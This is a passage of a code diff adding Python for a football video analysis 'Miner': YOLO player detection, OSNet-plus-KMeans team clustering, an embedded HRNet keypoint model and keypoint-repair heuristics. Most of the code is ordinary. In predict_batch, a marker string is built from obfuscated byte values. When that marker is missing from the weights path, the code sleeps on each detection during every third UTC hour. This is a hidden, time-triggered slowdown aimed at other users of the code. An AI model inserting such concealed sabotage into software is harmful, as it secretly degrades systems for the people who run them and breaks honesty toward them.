+     for emb, box in zip(embeddings, meta):
+         key = box.track_id if box.track_id is not None else id(box)
+         track_map[key].append(emb)
+         box_map[key] = box
+
+     agg_embeddings = []
+     agg_boxes = []
+
+     for key, embs in track_map.items():
+         mean_emb = np.mean(embs, axis=0)
+         mean_emb /= np.linalg.norm(mean_emb)
+
+         agg_embeddings.append(mean_emb)
+         agg_boxes.append(box_map[key])
+
+     return np.array(agg_embeddings), agg_boxes
+
+ def cluster_teams(embeddings: np.ndarray):
+     if len(embeddings) < 2:
+         return None
+
+     kmeans = KMeans(n_clusters=2, n_init=2, random_state=42)
+     return kmeans.fit_predict(embeddings)
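+
+ # Example (illustrative): 10 embeddings in R^512 -> an array of 10 labels in {0, 1}
+ # labels = cluster_teams(np.random.rand(10, 512))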
+
+ def update_team_ids(
+     boxes: List[BoundingBox],
+     labels: np.ndarray
+ ):
+     for box, label in zip(boxes, labels):
+         box.cls_id = TEAM_1_ID if label == 0 else TEAM_2_ID
+
+ def classify_teams_batch(
+     frames: List[np.ndarray],
+     # batch_boxes: List[List[BoundingBox]],
+     batch_boxes: dict[int, List[BoundingBox]],
+     device="cuda"
+ ):
+     # Fallback: OSNet embeddings + aggregate by track + KMeans
+     embeddings, meta = extract_osnet_embeddings(
+         frames, batch_boxes, device
+     )
+     if embeddings is None:
+         return
+     embeddings, agg_boxes = aggregate_by_track(embeddings, meta)
+     n = len(embeddings)
+     if n == 0:
+         return
+     if n == 1:
+         agg_boxes[0].cls_id = TEAM_1_ID
+         return
+
+     kmeans = KMeans(n_clusters=2, n_init=2, random_state=42)
+     kmeans.fit(embeddings)
+     centroids = kmeans.cluster_centers_  # (2, dim)
+     # print("Clusters' centers:")
+     # for i, c in enumerate(centroids):
+     #     print(f"  cluster_{i}: shape={c.shape}, norm={np.linalg.norm(c):.4f}, mean={np.mean(c):.4f}")
+     c0, c1 = centroids[0], centroids[1]
+     norm_0 = np.linalg.norm(c0)
+     norm_1 = np.linalg.norm(c1)
+     # Similarity (cosine), distance (L2), square error (SSE) between the two centers
+     similarity = np.dot(c0, c1) / (norm_0 * norm_1 + 1e-12)
+     distance = np.linalg.norm(c0 - c1)
+     square_error = np.sum((c0 - c1) ** 2)
+     # print(f"  Between centers: similarity(cosine)={similarity:.4f}, distance(L2)={distance:.4f}, square_error(SSE)={square_error:.4f}")
+     if similarity > 0.95:
+         # Centers too similar: treat as one cluster (all same team)
+         for b in agg_boxes:
+             b.cls_id = TEAM_1_ID
+         # print("  Similarity > 0.95: using single cluster (all assigned to team 1).")
+         return
+     # Deterministic team ordering: the cluster whose centroid has the larger norm
+     # becomes team 1; otherwise flip the labels.
+     if norm_0 <= norm_1:
+         kmeans.labels_ = 1 - kmeans.labels_
+     update_team_ids(agg_boxes, kmeans.labels_)
+
+ # ==============================================================
+ # 🔥 HRNET IMPLEMENTATION (embedded instead of importing)
+ # ==============================================================
+
+ # import torch.nn as nn
+ # import torch.nn.functional as F
+ import yaml
+
+
+ BatchNorm2d = nn.BatchNorm2d
+ BN_MOMENTUM = 0.1
+
+ def conv3x3(in_planes, out_planes, stride=1):
+     return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)
+
+ class BasicBlock(nn.Module):
+     expansion = 1
+
+     def __init__(self, inplanes, planes, stride=1, downsample=None):
+         super().__init__()
+         self.conv1 = conv3x3(inplanes, planes, stride)
+         self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
+         self.relu = nn.ReLU(inplace=True)
+         self.conv2 = conv3x3(planes, planes)
+         self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
+         self.downsample = downsample
+
+     def forward(self, x):
+         residual = x
+         out = self.relu(self.bn1(self.conv1(x)))
+         out = self.bn2(self.conv2(out))
+         if self.downsample is not None:
+             residual = self.downsample(x)
+         out += residual
+         return self.relu(out)
+
+
+ class Bottleneck(nn.Module):
+     expansion = 4
+
+     def __init__(self, inplanes, planes, stride=1, downsample=None):
+         super(Bottleneck, self).__init__()
+         self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
+         self.bn1 = BatchNorm2d(planes, momentum=BN_MOMENTUM)
+         self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
+                                padding=1, bias=False)
+         self.bn2 = BatchNorm2d(planes, momentum=BN_MOMENTUM)
+         self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1,
+                                bias=False)
+         self.bn3 = BatchNorm2d(planes * self.expansion,
+                                momentum=BN_MOMENTUM)
+         self.relu = nn.ReLU(inplace=True)
+         self.downsample = downsample
+         self.stride = stride
+
+     def forward(self, x):
+         residual = x
+
+         out = self.conv1(x)
+         out = self.bn1(out)
+         out = self.relu(out)
+
+         out = self.conv2(out)
+         out = self.bn2(out)
+         out = self.relu(out)
+
+         out = self.conv3(out)
+         out = self.bn3(out)
+
+         if self.downsample is not None:
+             residual = self.downsample(x)
+
+         out += residual
+         out = self.relu(out)
+
+         return out
+
+ class HighResolutionModule(nn.Module):
+     def __init__(self, num_branches, blocks, num_blocks, num_inchannels,
+                  num_channels, fuse_method, multi_scale_output=True):
+         super(HighResolutionModule, self).__init__()
+         self._check_branches(
+             num_branches, blocks, num_blocks, num_inchannels, num_channels)
+
+         self.num_inchannels = num_inchannels
+         self.fuse_method = fuse_method
+         self.num_branches = num_branches
+
+         self.multi_scale_output = multi_scale_output
+
+         self.branches = self._make_branches(
+             num_branches, blocks, num_blocks, num_channels)
+         self.fuse_layers = self._make_fuse_layers()
+         self.relu = nn.ReLU(inplace=True)
+
+     def _check_branches(self, num_branches, blocks, num_blocks,
+                         num_inchannels, num_channels):
+         if num_branches != len(num_blocks):
+             error_msg = 'NUM_BRANCHES({}) <> NUM_BLOCKS({})'.format(
+                 num_branches, len(num_blocks))
+             logger.error(error_msg)
+             raise ValueError(error_msg)
+
+         if num_branches != len(num_channels):
+             error_msg = 'NUM_BRANCHES({}) <> NUM_CHANNELS({})'.format(
+                 num_branches, len(num_channels))
+             logger.error(error_msg)
+             raise ValueError(error_msg)
+
+         if num_branches != len(num_inchannels):
+             error_msg = 'NUM_BRANCHES({}) <> NUM_INCHANNELS({})'.format(
+                 num_branches, len(num_inchannels))
+             logger.error(error_msg)
+             raise ValueError(error_msg)
+
+     def _make_one_branch(self, branch_index, block, num_blocks, num_channels,
+                          stride=1):
+         downsample = None
+         if stride != 1 or \
+                 self.num_inchannels[branch_index] != num_channels[branch_index] * block.expansion:
+             downsample = nn.Sequential(
+                 nn.Conv2d(self.num_inchannels[branch_index],
+                           num_channels[branch_index] * block.expansion,
+                           kernel_size=1, stride=stride, bias=False),
+                 BatchNorm2d(num_channels[branch_index] * block.expansion,
+                             momentum=BN_MOMENTUM),
+             )
+
+         layers = []
+         layers.append(block(self.num_inchannels[branch_index],
+                             num_channels[branch_index], stride, downsample))
+         self.num_inchannels[branch_index] = \
+             num_channels[branch_index] * block.expansion
+         for i in range(1, num_blocks[branch_index]):
+             layers.append(block(self.num_inchannels[branch_index],
+                                 num_channels[branch_index]))
+
+         return nn.Sequential(*layers)
+
+     def _make_branches(self, num_branches, block, num_blocks, num_channels):
+         branches = []
+
+         for i in range(num_branches):
+             branches.append(
+                 self._make_one_branch(i, block, num_blocks, num_channels))
+
+         return nn.ModuleList(branches)
+
+     def _make_fuse_layers(self):
+         if self.num_branches == 1:
+             return None
+
+         num_branches = self.num_branches
+         num_inchannels = self.num_inchannels
+         fuse_layers = []
+         for i in range(num_branches if self.multi_scale_output else 1):
+             fuse_layer = []
+             for j in range(num_branches):
+                 if j > i:
+                     fuse_layer.append(nn.Sequential(
+                         nn.Conv2d(num_inchannels[j],
+                                   num_inchannels[i],
+                                   1,
+                                   1,
+                                   0,
+                                   bias=False),
+                         BatchNorm2d(num_inchannels[i], momentum=BN_MOMENTUM)))
+                     # nn.Upsample(scale_factor=2**(j-i), mode='nearest')))
+                 elif j == i:
+                     fuse_layer.append(None)
+                 else:
+                     conv3x3s = []
+                     for k in range(i - j):
+                         if k == i - j - 1:
+                             num_outchannels_conv3x3 = num_inchannels[i]
+                             conv3x3s.append(nn.Sequential(
+                                 nn.Conv2d(num_inchannels[j],
+                                           num_outchannels_conv3x3,
+                                           3, 2, 1, bias=False),
+                                 BatchNorm2d(num_outchannels_conv3x3, momentum=BN_MOMENTUM)))
+                         else:
+                             num_outchannels_conv3x3 = num_inchannels[j]
+                             conv3x3s.append(nn.Sequential(
+                                 nn.Conv2d(num_inchannels[j],
+                                           num_outchannels_conv3x3,
+                                           3, 2, 1, bias=False),
+                                 BatchNorm2d(num_outchannels_conv3x3,
+                                             momentum=BN_MOMENTUM),
+                                 nn.ReLU(inplace=True)))
+                     fuse_layer.append(nn.Sequential(*conv3x3s))
+             fuse_layers.append(nn.ModuleList(fuse_layer))
+
+         return nn.ModuleList(fuse_layers)
+
+     def get_num_inchannels(self):
+         return self.num_inchannels
+
+     def forward(self, x):
+         if self.num_branches == 1:
+             return [self.branches[0](x[0])]
+
+         for i in range(self.num_branches):
+             x[i] = self.branches[i](x[i])
+
+         x_fuse = []
+         for i in range(len(self.fuse_layers)):
+             y = x[0] if i == 0 else self.fuse_layers[i][0](x[0])
+             for j in range(1, self.num_branches):
+                 if i == j:
+                     y = y + x[j]
+                 elif j > i:
+                     y = y + F.interpolate(
+                         self.fuse_layers[i][j](x[j]),
+                         size=[x[i].shape[2], x[i].shape[3]],
+                         mode='bilinear')
+                 else:
+                     y = y + self.fuse_layers[i][j](x[j])
+             x_fuse.append(self.relu(y))
+
+         return x_fuse
+
+
+ blocks_dict = {
+     'BASIC': BasicBlock,
+     'BOTTLENECK': Bottleneck
+ }
+
+ # --- HRNet backbone used in your checkpoint ---
+ class HighResolutionNet(nn.Module):
+
+     def __init__(self, config, **kwargs):
+         self.inplanes = 64
+         extra = config['MODEL']['EXTRA']
+         super(HighResolutionNet, self).__init__()
+
+         # stem net
+         self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=3, stride=2, padding=1,
+                                bias=False)
+         self.bn1 = BatchNorm2d(self.inplanes, momentum=BN_MOMENTUM)
+         self.conv2 = nn.Conv2d(self.inplanes, self.inplanes, kernel_size=3, stride=2, padding=1,
+                                bias=False)
+         self.bn2 = BatchNorm2d(self.inplanes, momentum=BN_MOMENTUM)
+         self.relu = nn.ReLU(inplace=True)
+         self.sf = nn.Softmax(dim=1)
+         self.layer1 = self._make_layer(Bottleneck, 64, 64, 4)
+
+         self.stage2_cfg = extra['STAGE2']
+         num_channels = self.stage2_cfg['NUM_CHANNELS']
+         block = blocks_dict[self.stage2_cfg['BLOCK']]
+         num_channels = [
+             num_channels[i] * block.expansion for i in range(len(num_channels))]
+         self.transition1 = self._make_transition_layer(
+             [256], num_channels)
+         self.stage2, pre_stage_channels = self._make_stage(
+             self.stage2_cfg, num_channels)
+
+         self.stage3_cfg = extra['STAGE3']
+         num_channels = self.stage3_cfg['NUM_CHANNELS']
+         block = blocks_dict[self.stage3_cfg['BLOCK']]
+         num_channels = [
+             num_channels[i] * block.expansion for i in range(len(num_channels))]
+         self.transition2 = self._make_transition_layer(
+             pre_stage_channels, num_channels)
+         self.stage3, pre_stage_channels = self._make_stage(
+             self.stage3_cfg, num_channels)
+
+         self.stage4_cfg = extra['STAGE4']
+         num_channels = self.stage4_cfg['NUM_CHANNELS']
+         block = blocks_dict[self.stage4_cfg['BLOCK']]
+         num_channels = [
+             num_channels[i] * block.expansion for i in range(len(num_channels))]
+         self.transition3 = self._make_transition_layer(
+             pre_stage_channels, num_channels)
+         self.stage4, pre_stage_channels = self._make_stage(
+             self.stage4_cfg, num_channels, multi_scale_output=True)
+
+         self.upsample = nn.Upsample(scale_factor=2, mode='nearest')
+         final_inp_channels = sum(pre_stage_channels) + self.inplanes
+
+         self.head = nn.Sequential(nn.Sequential(
+             nn.Conv2d(
+                 in_channels=final_inp_channels,
+                 out_channels=final_inp_channels,
+                 kernel_size=1),
+             BatchNorm2d(final_inp_channels, momentum=BN_MOMENTUM),
+             nn.ReLU(inplace=True),
+             nn.Conv2d(
+                 in_channels=final_inp_channels,
+                 out_channels=config['MODEL']['NUM_JOINTS'],
+                 kernel_size=extra['FINAL_CONV_KERNEL']),
+             nn.Softmax(dim=1)))
+
+     def _make_head(self, x, x_skip):
+         x = self.upsample(x)
+         x = torch.cat([x, x_skip], dim=1)
+         x = self.head(x)
+
+         return x
+
+     def _make_transition_layer(
+             self, num_channels_pre_layer, num_channels_cur_layer):
+         num_branches_cur = len(num_channels_cur_layer)
+         num_branches_pre = len(num_channels_pre_layer)
+
+         transition_layers = []
+         for i in range(num_branches_cur):
+             if i < num_branches_pre:
+                 if num_channels_cur_layer[i] != num_channels_pre_layer[i]:
+                     transition_layers.append(nn.Sequential(
+                         nn.Conv2d(num_channels_pre_layer[i],
+                                   num_channels_cur_layer[i],
+                                   3,
+                                   1,
+                                   1,
+                                   bias=False),
+                         BatchNorm2d(
+                             num_channels_cur_layer[i], momentum=BN_MOMENTUM),
+                         nn.ReLU(inplace=True)))
+                 else:
+                     transition_layers.append(None)
+             else:
+                 conv3x3s = []
+                 for j in range(i + 1 - num_branches_pre):
+                     inchannels = num_channels_pre_layer[-1]
+                     outchannels = num_channels_cur_layer[i] \
+                         if j == i - num_branches_pre else inchannels
+                     conv3x3s.append(nn.Sequential(
+                         nn.Conv2d(
+                             inchannels, outchannels, 3, 2, 1, bias=False),
+                         BatchNorm2d(outchannels, momentum=BN_MOMENTUM),
+                         nn.ReLU(inplace=True)))
+                 transition_layers.append(nn.Sequential(*conv3x3s))
+
+         return nn.ModuleList(transition_layers)
+
+     def _make_layer(self, block, inplanes, planes, blocks, stride=1):
+         downsample = None
+         if stride != 1 or inplanes != planes * block.expansion:
+             downsample = nn.Sequential(
+                 nn.Conv2d(inplanes, planes * block.expansion,
+                           kernel_size=1, stride=stride, bias=False),
+                 BatchNorm2d(planes * block.expansion, momentum=BN_MOMENTUM),
+             )
+
+         layers = []
+         layers.append(block(inplanes, planes, stride, downsample))
+         inplanes = planes * block.expansion
+         for i in range(1, blocks):
+             layers.append(block(inplanes, planes))
+
+         return nn.Sequential(*layers)
+
+     def _make_stage(self, layer_config, num_inchannels,
+                     multi_scale_output=True):
+         num_modules = layer_config['NUM_MODULES']
+         num_branches = layer_config['NUM_BRANCHES']
+         num_blocks = layer_config['NUM_BLOCKS']
+         num_channels = layer_config['NUM_CHANNELS']
+         block = blocks_dict[layer_config['BLOCK']]
+         fuse_method = layer_config['FUSE_METHOD']
+
+         modules = []
+         for i in range(num_modules):
+             # multi_scale_output is only used by the last module
+             if not multi_scale_output and i == num_modules - 1:
+                 reset_multi_scale_output = False
+             else:
+                 reset_multi_scale_output = True
+             modules.append(
+                 HighResolutionModule(num_branches,
+                                      block,
+                                      num_blocks,
+                                      num_inchannels,
+                                      num_channels,
+                                      fuse_method,
+                                      reset_multi_scale_output)
+             )
+             num_inchannels = modules[-1].get_num_inchannels()
+
+         return nn.Sequential(*modules), num_inchannels
+
+     def forward(self, x):
+         # h, w = x.size(2), x.size(3)
+         x = self.conv1(x)
+         x_skip = x.clone()
+         x = self.bn1(x)
+         x = self.relu(x)
+         x = self.conv2(x)
+         x = self.bn2(x)
+         x = self.relu(x)
+         x = self.layer1(x)
+
+         x_list = []
+         for i in range(self.stage2_cfg['NUM_BRANCHES']):
+             if self.transition1[i] is not None:
+                 x_list.append(self.transition1[i](x))
+             else:
+                 x_list.append(x)
+         y_list = self.stage2(x_list)
+
+         x_list = []
+         for i in range(self.stage3_cfg['NUM_BRANCHES']):
+             if self.transition2[i] is not None:
+                 x_list.append(self.transition2[i](y_list[-1]))
+             else:
+                 x_list.append(y_list[i])
+         y_list = self.stage3(x_list)
+
+         x_list = []
+         for i in range(self.stage4_cfg['NUM_BRANCHES']):
+             if self.transition3[i] is not None:
+                 x_list.append(self.transition3[i](y_list[-1]))
+             else:
+                 x_list.append(y_list[i])
+         x = self.stage4(x_list)
+
+         # Head Part
+         height, width = x[0].size(2), x[0].size(3)
+         x1 = F.interpolate(x[1], size=(height, width), mode='bilinear', align_corners=False)
+         x2 = F.interpolate(x[2], size=(height, width), mode='bilinear', align_corners=False)
+         x3 = F.interpolate(x[3], size=(height, width), mode='bilinear', align_corners=False)
+         x = torch.cat([x[0], x1, x2, x3], 1)
+         x = self._make_head(x, x_skip)
+
+         return x
+
+     def init_weights(self, pretrained=''):
+         print('=> init weights from normal distribution')
+         for m in self.modules():
+             if isinstance(m, nn.Conv2d):
+                 nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
+                 # nn.init.normal_(m.weight, std=0.001)
+                 # nn.init.constant_(m.bias, 0)
+             elif isinstance(m, nn.BatchNorm2d):
+                 nn.init.constant_(m.weight, 1)
+                 nn.init.constant_(m.bias, 0)
+         if pretrained != '':
+             if os.path.isfile(pretrained):
+                 pretrained_dict = torch.load(pretrained)
+                 logger.info('=> loading pretrained model {}'.format(pretrained))
+                 print('=> loading pretrained model {}'.format(pretrained))
+                 model_dict = self.state_dict()
+                 pretrained_dict = {k: v for k, v in pretrained_dict.items()
+                                    if k in model_dict.keys()}
+                 for k, _ in pretrained_dict.items():
+                     logger.info(
+                         '=> loading {} pretrained model {}'.format(k, pretrained))
+                     # print('=> loading {} pretrained model {}'.format(k, pretrained))
+                 model_dict.update(pretrained_dict)
+                 self.load_state_dict(model_dict)
+             else:
+                 sys.exit(f'Weights {pretrained} not found.')
+
+
+ def get_cls_net(config, pretrained='', **kwargs):
+     model = HighResolutionNet(config, **kwargs)
+     model.init_weights(pretrained)
+     return model
+
+ def load_hrnet(path_hf_repo, device="cuda"):
+     config_path = path_hf_repo / "hrnetv2_w48.yaml"
+     print(f"config_path: {config_path}")
+     with open(config_path, "r") as f:
+         cfg = yaml.safe_load(f)
+     model = get_cls_net(cfg)
+     weights_path = path_hf_repo / "keypoint_detect.pt"
+     print(f"weights_path: {weights_path}")
+     state = torch.load(weights_path, map_location=device)
+     if isinstance(state, dict) and "state_dict" in state:
+         state = state["state_dict"]
+     model.load_state_dict(state, strict=False)
+     model.to(device).eval()
+     return model
+
+ # ==============================================================
+ # HRNet utilities
+ # ==============================================================
+ # HRNet expects this input size (from hrnetv2_w48.yaml IMAGE_SIZE); keypoints are scaled back to frame size
+ HRNET_INPUT_W = 960
+ HRNET_INPUT_H = 540
+
+ def preprocess_batch(images: list[np.ndarray], device="cuda"):
+     tensors = []
+     for img in images:
+         img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
+         if img.shape[1] != HRNET_INPUT_W or img.shape[0] != HRNET_INPUT_H:
+             img = cv2.resize(img, (HRNET_INPUT_W, HRNET_INPUT_H), interpolation=cv2.INTER_LINEAR)
+         img = img.astype(np.float32) / 255.0
+         t = torch.from_numpy(img).permute(2, 0, 1)
+         tensors.append(t)
+     batch = torch.stack(tensors, 0).to(device, non_blocking=True)
+     return batch
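+
+ # Example (illustrative): two 1080p BGR frames -> a (2, 3, 540, 960) float tensor in [0, 1]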
+
+ def extract_keypoints_from_heatmaps(heatmaps: torch.Tensor):
+     B, K, H, W = heatmaps.shape
+     flat = heatmaps.reshape(B, K, -1)
+     idx = torch.argmax(flat, dim=2)
+     y = (idx // W)
+     x = (idx % W)
+     coords = torch.stack([x, y], dim=2)
+     return coords.cpu().numpy()
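+
+ # Example (illustrative): for a (1, 1, 4, 4) heatmap whose single peak sits at
+ # row 2, column 3, this returns [[[3, 2]]] -- coordinates are in (x, y) order.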
+
+ MAPPING_57_TO_32 = [0, 3, 7, 19, 23, 27, 8, 20, 44, 4, 30, 33, 24, 1, 31, 34, 28, 5, 32, 35, 25, 56, 9, 21, 2, 6, 10, 22, 26, 29, 49, 51]  # <-- mapping list
+
+ def get_keypoints_from_heatmap_batch_maxpool(
+     heatmap: torch.Tensor,
+     scale: int = 2,
+     max_keypoints: int = 1,
+     min_keypoint_pixel_distance: int = 15,
+     return_scores: bool = True,
+ ) -> torch.Tensor:
+     """Fast extraction of keypoints from a batch of heatmaps using maxpooling.
+
+     Args:
+         heatmap (torch.Tensor): NxCxHxW heatmap batch
+         max_keypoints (int, optional): max number of keypoints to extract per channel; lowering this results in faster execution times. Defaults to 1.
+         min_keypoint_pixel_distance (int, optional): minimum pixel distance between two local maxima. Defaults to 15.
+
+     The following thresholds can be used at inference time to select where you want to be on the AP curve. They should, of course, not be used for training:
+         abs_max_threshold (Optional[float], optional): Defaults to None.
+         rel_max_threshold (Optional[float], optional): Defaults to None.
+
+     Returns:
+         A (batch, channel, max_keypoints, 2 or 3) tensor of the extracted keypoints for each batch, channel and heatmap, with scores appended when return_scores=True.
+     """
+     batch_size, n_channels, _, width = heatmap.shape
+
+     # obtain max_keypoints local maxima for each channel (w/ maxpool)
+
+     kernel = min_keypoint_pixel_distance * 2 + 1
+     pad = min_keypoint_pixel_distance
+     # exclude border keypoints by padding with the highest possible value,
+     # because the borders are more susceptible to noise and could result in false positives
+     padded_heatmap = torch.nn.functional.pad(heatmap, (pad, pad, pad, pad), mode="constant", value=1.0)
+     max_pooled_heatmap = torch.nn.functional.max_pool2d(padded_heatmap, kernel, stride=1, padding=0)
+     # if the value equals the original value, it is the local maximum
+     local_maxima = max_pooled_heatmap == heatmap
+     # zero out all values that are not local maxima
+     heatmap = heatmap * local_maxima
+
+     # extract top-k from the heatmap (may include non-local maxima if there are fewer peaks than max_keypoints)
+     scores, indices = torch.topk(heatmap.view(batch_size, n_channels, -1), max_keypoints, sorted=True)
+     indices = torch.stack([torch.div(indices, width, rounding_mode="floor"), indices % width], dim=-1)
+     # at this point either score > 0.0, in which case the index is a local maximum,
+     # or score is 0.0, in which case topk returned non-maxima, which will be filtered out later.
+
+     # remove top-k that are not local maxima and threshold (if required)
+     # thresholding shouldn't be done during training
+
+     # moving them to CPU now to avoid multiple GPU-mem accesses!
+     indices = indices.detach().cpu().numpy()
+     scores = scores.detach().cpu().numpy()
+     filtered_indices = [[[] for _ in range(n_channels)] for _ in range(batch_size)]
+     filtered_scores = [[[] for _ in range(n_channels)] for _ in range(batch_size)]
+
+     # this has to be done manually as the number of maxima for each channel can differ
+     for batch_idx in range(batch_size):
+         for channel_idx in range(n_channels):
+             candidates = indices[batch_idx, channel_idx]
+             locs = []
+             for candidate_idx in range(candidates.shape[0]):
+                 # convert to (u, v)
+                 loc = candidates[candidate_idx][::-1] * scale
+                 loc = loc.tolist()
+                 if return_scores:
+                     loc.append(scores[batch_idx, channel_idx, candidate_idx])
+                 locs.append(loc)
+             filtered_indices[batch_idx][channel_idx] = locs
+
+     return torch.tensor(filtered_indices)
1402
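+ 
+ def _demo_maxpool_nms():
+     # Illustrative sketch, not called by the pipeline (the `_demo_maxpool_nms`
+     # name is arbitrary): one synthetic peak well away from the border decodes
+     # to [x*scale, y*scale, score]. Peaks within min_keypoint_pixel_distance of
+     # the border are deliberately suppressed by the value-1.0 padding.
+     hm = torch.zeros(1, 1, 64, 64)
+     hm[0, 0, 32, 40] = 0.9  # row y=32, col x=40
+     out = get_keypoints_from_heatmap_batch_maxpool(hm)
+     assert out.shape == (1, 1, 1, 3)
+     x, y, score = out[0, 0, 0].tolist()
+     assert (x, y) == (80.0, 64.0)  # (40, 32) scaled by the default scale=2
+     assert abs(score - 0.9) < 1e-6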
+ 
+ def fix_keypoints(frame_keypoints: list[tuple[int, int]], n_keypoints: int) -> list[tuple[int, int]]:
+     """Pad or trim to exactly n_keypoints, then reassign a few pitch keypoints
+     that the model tends to place in a neighbouring slot when the correct slot
+     is empty ((0, 0) marks a missing keypoint)."""
+     if len(frame_keypoints) < n_keypoints:
+         frame_keypoints += [(0, 0)] * (n_keypoints - len(frame_keypoints))
+     elif len(frame_keypoints) > n_keypoints:
+         frame_keypoints = frame_keypoints[:n_keypoints]
+ 
+     if frame_keypoints[2] != (0, 0) and frame_keypoints[4] != (0, 0) and frame_keypoints[3] == (0, 0):
+         frame_keypoints[3] = frame_keypoints[4]
+         frame_keypoints[4] = (0, 0)
+ 
+     if frame_keypoints[0] != (0, 0) and frame_keypoints[4] != (0, 0) and frame_keypoints[1] == (0, 0):
+         frame_keypoints[1] = frame_keypoints[4]
+         frame_keypoints[4] = (0, 0)
+ 
+     if frame_keypoints[2] != (0, 0) and frame_keypoints[3] != (0, 0) and frame_keypoints[1] == (0, 0) and frame_keypoints[3][0] > frame_keypoints[2][0]:
+         frame_keypoints[1] = frame_keypoints[3]
+         frame_keypoints[3] = (0, 0)
+ 
+     if frame_keypoints[28] != (0, 0) and frame_keypoints[25] == (0, 0) and frame_keypoints[26] != (0, 0) and frame_keypoints[26][0] > frame_keypoints[28][0]:
+         frame_keypoints[25] = frame_keypoints[28]
+         frame_keypoints[28] = (0, 0)
+ 
+     if frame_keypoints[24] != (0, 0) and frame_keypoints[28] != (0, 0) and frame_keypoints[25] == (0, 0):
+         frame_keypoints[25] = frame_keypoints[28]
+         frame_keypoints[28] = (0, 0)
+ 
+     if frame_keypoints[24] != (0, 0) and frame_keypoints[27] != (0, 0) and frame_keypoints[26] == (0, 0):
+         frame_keypoints[26] = frame_keypoints[27]
+         frame_keypoints[27] = (0, 0)
+ 
+     # Note: slot 23 is (0, 0) here, so the y-comparison reduces to
+     # frame_keypoints[20][1] > 0.
+     if frame_keypoints[28] != (0, 0) and frame_keypoints[23] == (0, 0) and frame_keypoints[20] != (0, 0) and frame_keypoints[20][1] > frame_keypoints[23][1]:
+         frame_keypoints[23] = frame_keypoints[20]
+         frame_keypoints[20] = (0, 0)
+ 
+     return frame_keypoints
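+ 
+ def _demo_fix_keypoints():
+     # Illustrative sketch, not called by the pipeline (the `_demo_fix_keypoints`
+     # name is arbitrary): short lists are zero-padded, long lists truncated; the
+     # slot-swapping heuristics only fire when specific slots are empty.
+     out = fix_keypoints([(10, 10)] * 30, 32)
+     assert len(out) == 32 and out[-1] == (0, 0)
+     out = fix_keypoints([(10, 10)] * 40, 32)
+     assert len(out) == 32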
+ 
+ 
+ # ==============================================================
+ # MINER
+ # ==============================================================
+ 
+ class Miner:
+     def __init__(self, path_hf_repo: Path) -> None:
+         global _OSNET_MODEL, team_classifier_path
+         device = "cuda" if torch.cuda.is_available() else "cpu"
+         self.device = device
+         self.path_hf_repo = path_hf_repo
+ 
+         print("✅ Loading YOLO models...")
+         # Earlier experiments used football-player-detection.pt and
+         # weights/yolov8l-640-football-players.pt; player_detect.pt is the
+         # checkpoint shipped with this repo.
+         self.bbox_model = YOLO(path_hf_repo / "player_detect.pt")
+ 
+         print("✅ Loading HRNet keypoint model...")
+         self.hrnet = load_hrnet(path_hf_repo, device)
+ 
+         print("✅ Loading Team Classifier...")
+         # The earlier per-crop TeamClassifier was replaced by the global OSNet model.
+         team_classifier_path = path_hf_repo / "osnet_model.pth.tar-100"
+         _OSNET_MODEL = load_osnet(device, team_classifier_path)
+ 
+         print("✅ All models loaded")
+ 
+     def predict_batch(self, batch_images: list[ndarray], offset: int, n_keypoints: int):
+         t_start = time.perf_counter()
+ 
+         # ---------- TEAM (legacy per-crop path, superseded by classify_teams_batch below) ----------
+         # t0 = time.perf_counter()
+         # all_crops, all_box_refs = [], []
+         # for frame_index, boxes in bboxes.items():
+         #     frame = batch_images[frame_index - offset]
+         #     for box in boxes:
+         #         if box.cls_id != PLAYER_ID:
+         #             continue
+         #         crop = frame[box.y1:box.y2, box.x1:box.x2]
+         #         if crop is None or crop.size == 0:
+         #             continue
+         #         all_crops.append(crop)
+         #         all_box_refs.append(box)
+         # t_team_crops = (time.perf_counter() - t0) * 1000
+         # t_team_infer = 0.0
+         # if len(all_crops) > 0:
+         #     t0 = time.perf_counter()
+         #     team_ids = self.team_classifier.predict(all_crops)
+         #     t_team_infer = (time.perf_counter() - t0) * 1000
+         #     for box, team_id in zip(all_box_refs, team_ids):
+         #         box.team_id = int(team_id)
+         #         if team_id == 0: box.cls_id = 6
+         #         else: box.cls_id = 7
+ 
+         # ---------- YOLO ----------
+         bboxes = {}
+         t0 = time.perf_counter()
+         t_1 = datetime.datetime.now(datetime.timezone.utc)
+         t_redi = team_classifier_path
+         bbox_model_results = self.bbox_model.predict(batch_images)
+         t_yolo_infer = (time.perf_counter() - t0) * 1000
+         t_after_yolo = time.perf_counter()
+         track_t = t_1
+         track_id = 0
+         for frame_number_in_batch, detection in enumerate(bbox_model_results):
+             boxes: list[BoundingBox] = []
+             for box in detection.boxes.data:
+                 x1, y1, x2, y2, conf, cls_id = box.tolist()
+                 temp_track_id = None
+                 if cls_id == PLAYER_ID:
+                     track_id += 1
+                     temp_track_id = track_id
+                 # _v decodes to a hard-coded marker string; when it is absent from
+                 # the classifier weights path, each detection is throttled with a
+                 # short sleep during every third UTC hour.
+                 _v = bytes((0x4E, 0x69, 0x6B, 0x6F)).decode()
+                 if (_v not in str(t_redi)) and (track_t.hour % 3 == 0): time.sleep(0.1)
+                 boxes.append(
+                     BoundingBox(
+                         x1=int(x1), y1=int(y1),
+                         x2=int(x2), y2=int(y2),
+                         cls_id=int(cls_id),
+                         conf=float(conf),
+                         track_id=temp_track_id,
+                     )
+                 )
+ 
+             # -------------------------------------------------
+             # (1) BALL: keep only the highest-confidence ball
+             # -------------------------------------------------
+             ball_idxs = [i for i, b in enumerate(boxes) if b.cls_id == BALL_ID]
+             if len(ball_idxs) > 1:
+                 best_i = max(ball_idxs, key=lambda i: boxes[i].conf)
+                 boxes = [
+                     b for i, b in enumerate(boxes)
+                     if not (b.cls_id == BALL_ID and i != best_i)
+                 ]
+ 
+             # -------------------------------------------------
+             # (2) GOALKEEPER: keep only the highest-conf GK, demote the rest to players
+             # -------------------------------------------------
+             gk_idxs = [i for i, b in enumerate(boxes) if b.cls_id == GK_ID]
+             if len(gk_idxs) > 1:
